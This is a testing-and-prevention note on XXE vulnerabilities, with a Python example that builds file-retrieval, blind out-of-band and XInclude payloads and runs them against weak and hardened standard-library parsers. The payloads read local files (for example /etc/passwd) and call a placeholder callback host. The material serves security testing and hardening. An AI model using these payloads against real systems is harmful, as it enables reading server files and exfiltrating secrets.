Testing & Prevention

How to Find and Test for XXE vulnerabilities

  • Use Burp Suite's web vulnerability scanner (Burp Scanner), which detects XXE automatically
  • Manual testing involves the following:
    • Testing for file retrieval by defining an external entity that points at a well-known OS file (such as /etc/passwd or C:\Windows\win.ini) and referencing it in a value the application reflects back
    • Testing for blind XXE by defining an external entity that points at a URL on a system you control, then watching for the resulting DNS or HTTP interaction
      • Burp Collaborator client can be used for this
    • Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document by using an XInclude attack (no DOCTYPE is possible there, so an xi:include element is used instead)

How to Prevent XXE Vulnerabilities

  • Disable the features of the application's XML parsing library that support potentially dangerous XML capabilities the application does not need
  • Disable resolution of external entities (general and parameter entities; disabling DTD/DOCTYPE processing altogether is the simplest option)
  • Disable support for XInclude
  • Both are done via the parser's configuration options or by programmatically overriding its default behaviour; check the defaults of the specific library and version, because they differ
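
The three manual tests above and the two parser settings that stop them, as one added example (not part of the original notes). It runs offline against the Python standard library: xml.sax with its feature_external_ges switch stands in for the target parser, xml.etree.ElementInclude stands in for XInclude processing, and a temporary file constructed here replaces /etc/passwd. The Collaborator URL is a placeholder, since the blind payload can only be confirmed by an out-of-band hit.

```python
"""XXE test payloads and the matching parser hardening, run offline against
the Python standard library. Added example, not from the original notes.
Assumptions: the target parser is Python's expat-based xml.sax reader plus
xml.etree.ElementInclude, and the sensitive file is a temp file made here."""
import io
import os
import tempfile
from pathlib import Path
import xml.sax
from xml.sax import handler
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

XI_NS = "http://www.w3.org/2001/XInclude"


def file_retrieval_payload(file_uri: str) -> bytes:
    """Classic XXE: an external entity pointing at a local file, referenced
    from an element the application reflects back (e.g. file:///etc/passwd)."""
    return (f'<?xml version="1.0"?>'
            f'<!DOCTYPE data [<!ENTITY xxe SYSTEM "{file_uri}">]>'
            f'<data>&xxe;</data>').encode()


def blind_oob_payload(callback_url: str) -> bytes:
    """Blind XXE: the entity points at a host you control (a Burp Collaborator
    domain, for instance). A DNS or HTTP hit there proves the parser resolves
    external entities even when nothing is reflected in the response."""
    return (f'<?xml version="1.0"?>'
            f'<!DOCTYPE data [<!ENTITY xxe SYSTEM "{callback_url}">]>'
            f'<data>&xxe;</data>').encode()


def xinclude_payload(href: str) -> str:
    """XInclude: used when only a fragment of user data is embedded in a
    server-side XML document, so no DOCTYPE can be declared. parse="text"
    keeps a non-XML target such as /etc/passwd from breaking the parse."""
    return (f'<foo xmlns:xi="{XI_NS}">'
            f'<xi:include parse="text" href="{href}"/></foo>')


class _TextCollector(handler.ContentHandler):
    """Collects character data, standing in for whatever the app reflects."""
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_with_sax(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """True is the weak configuration (external general entities fetched and
    expanded); False is the hardened one (the reference is silently ignored)."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def parse_with_xinclude(xml_text: str, process_includes: bool) -> str:
    """True expands xi:include (weak). False leaves the element inert, which
    is what "disable XInclude" means for ElementTree: never call
    ElementInclude.include on untrusted documents."""
    root = ET.fromstring(xml_text)
    if process_includes:
        ElementInclude.include(root)
    return root.text or ""


def demo(callback_url: str = "http://YOUR-COLLABORATOR-DOMAIN/x") -> dict:
    """Create a secret file, fire each payload at the weak and the hardened
    configuration, and report what leaked. Dict keys are hypothetical names."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w") as f:
            f.write("db_password=hunter2")  # constructed sample secret
        uri = Path(secret_path).as_uri()    # file:///.../secret.txt
        return {
            "xxe_weak": parse_with_sax(file_retrieval_payload(uri), True),
            "xxe_hardened": parse_with_sax(file_retrieval_payload(uri), False),
            "xinclude_weak": parse_with_xinclude(xinclude_payload(secret_path), True),
            "xinclude_hardened": parse_with_xinclude(xinclude_payload(secret_path), False),
            "blind_payload": blind_oob_payload(callback_url).decode(),
        }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The weak xml.sax configuration returns the file contents; the hardened one returns an empty string because the entity reference is never resolved. Since Python 3.7.1 the xml.sax reader ships with feature_external_ges off, which is the kind of version-dependent default the prevention list tells you to check rather than assume. The XInclude half shows that the protection is not a parser flag at all but simply never running the include step on untrusted input.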